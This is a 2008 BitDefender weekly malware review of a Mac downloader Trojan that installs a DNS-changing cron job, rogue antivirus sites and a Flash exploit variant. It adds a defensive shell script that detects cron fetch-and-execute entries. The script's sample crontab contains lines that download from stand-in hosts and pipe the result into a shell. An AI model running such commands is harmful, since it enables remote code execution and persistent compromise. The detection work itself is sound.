
Weekly Review

Bogdan BOTEZATU

December 05, 2008


Trojan.OSX.Jahlav.A

This is a Trojan downloader for Mac OS X. It usually comes as a disk image posing as a key generator/crack for various applications or as a video codec for online streaming. Once mounted, the image shows an install package which contains several files. Three of these files are of interest: Archive.pax.gz (which contains two files: AdobeFlash and Mozzilaplug.plugin), preinstall and preupgrade. “AdobeFlash”, “preinstall” and “preupgrade” are exactly the same file (a bash script).

Once executed, the script drops a file using the uudecode command. This file is another shell script which installs a crontab entry that checks a remote server for new files to download every 5 minutes. If a file is found and downloaded, it will be silently executed. This file is detected by BitDefender as MAC.OSX.Trojan.DNSChanger.A and changes the system's Domain Name Server address. As a result, people who think they're browsing to www.google.co.uk will be directed to a bogus website of the attacker's choice.
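The persistence mechanism described above (a crontab entry firing every few minutes that fetches from a remote host and executes the result) leaves a recognisable trace in the crontab itself. The following script is an added example of a defender-side check, not code from the original article or from BitDefender: it reads crontab text, isolates the schedule fields, and flags entries that combine a short interval with a fetch-and-execute command. The sample crontab, its host names (all under the reserved .invalid domain) and the helper names are constructed for the example; the heuristic assumes standard five-field crontab syntax.

```shell
#!/bin/sh
# Added example (not the article's or BitDefender's code): flag crontab entries
# that poll a remote host on a short schedule and run whatever they fetch,
# the pattern described for the Jahlav dropper. All hosts are constructed.

# Constructed sample crontab mixing benign and suspicious entries.
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/bin/find /tmp -mtime +7 -delete
*/5 * * * * /usr/bin/curl -s http://updates.example.invalid/new | /bin/sh
*/5 * * * * /bin/sh -c "cd /tmp && /usr/bin/curl -s -O http://example.invalid/x && ./x"
30 * * * * /usr/bin/rsync -a /home /backup
*/1 * * * * /usr/bin/wget -q -O - http://dl.example.invalid/payload | sh'

# is_short_interval MINUTE_FIELD
# True when the minute field is "*" (every minute) or a step "*/N" with N <= 10.
is_short_interval() {
    case "$1" in
        '*') return 0 ;;
        '*/'*)
            n=${1#\*/}
            case "$n" in
                ''|*[!0-9]*) return 1 ;;   # not a plain number
            esac
            [ "$n" -le 10 ]
            ;;
        *) return 1 ;;
    esac
}

# fetches_and_executes COMMAND
# True when the command both downloads from a remote host (curl/wget/ftp)
# and hands the result to a shell or executes the downloaded file.
fetches_and_executes() {
    cmd=$1
    case "$cmd" in
        *curl*|*wget*|*ftp*) ;;
        *) return 1 ;;
    esac
    case "$cmd" in
        *'| /bin/sh'*|*'| sh'*|*'|sh'*|*'|/bin/sh'*|*'| bash'*|*'&& ./'*|*'; ./'*) return 0 ;;
        *) return 1 ;;
    esac
}

# scan_crontab: reads crontab text on stdin, prints each suspicious entry.
scan_crontab() {
    while IFS= read -r line; do
        case "$line" in
            ''|'#'*) continue ;;           # skip blanks and comments
        esac
        set -f                             # no globbing while splitting "* * * * *"
        set -- $line
        set +f
        [ $# -ge 6 ] || continue           # need five schedule fields plus a command
        minute=$1
        shift 5
        cmd=$*
        if is_short_interval "$minute" && fetches_and_executes "$cmd"; then
            printf 'SUSPICIOUS: %s\n' "$line"
        fi
    done
}

# count_suspicious: number of flagged entries in the constructed sample.
count_suspicious() {
    printf '%s\n' "$SAMPLE_CRONTAB" | scan_crontab | wc -l | tr -d ' '
}

# Stand-alone run: list the flagged entries, then the count.
printf '%s\n' "$SAMPLE_CRONTAB" | scan_crontab
count_suspicious
```

On a real machine the input would come from `crontab -l` for each user (and the system cron directories) rather than the embedded sample. The check is deliberately a heuristic: a short interval alone is normal for monitoring jobs, and a download alone is normal for updaters; it is the combination of the two with immediate execution that matches the behaviour the article describes, so the entry is worth reviewing rather than something to delete blindly.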

It is suspected that this Trojan has the same source as the newer Trojan.Zlob (aka Trojan.DNSChanger) versions which basically have the same effect on Microsoft Windows operating systems. More information about this to come in the next few days.


Adware.VirusTrigger.A

Yet another attempt to fool unknowing users into downloading and installing rogue antivirus software. With a new design, they are pushing the same fake products after an “online scan” that detected lots of malware on their computers. Nothing new on this territory from a technological point of view. Here are a couple of screenshots of the new design, however. Beware of these websites!

[Screenshots: Antivirus trigger]

Trojan.Exploit.ANOI

What this version brings with it are just new methods of obfuscation in order to avoid AV detection. It is a weaker variant of Trojan.Exploit.SSX, meaning it only tries to exploit browsers with vulnerable Flash Players. It uses the deconcept JavaScript classes library in order to detect the Flash version running on the victim's machine. After that it will serve different SWF objects based on that version, which will try to exploit the already known vulnerability.

Information in this article is available courtesy of BitDefender virus researchers: Daniel Chipiristeanu, Daniel Radu
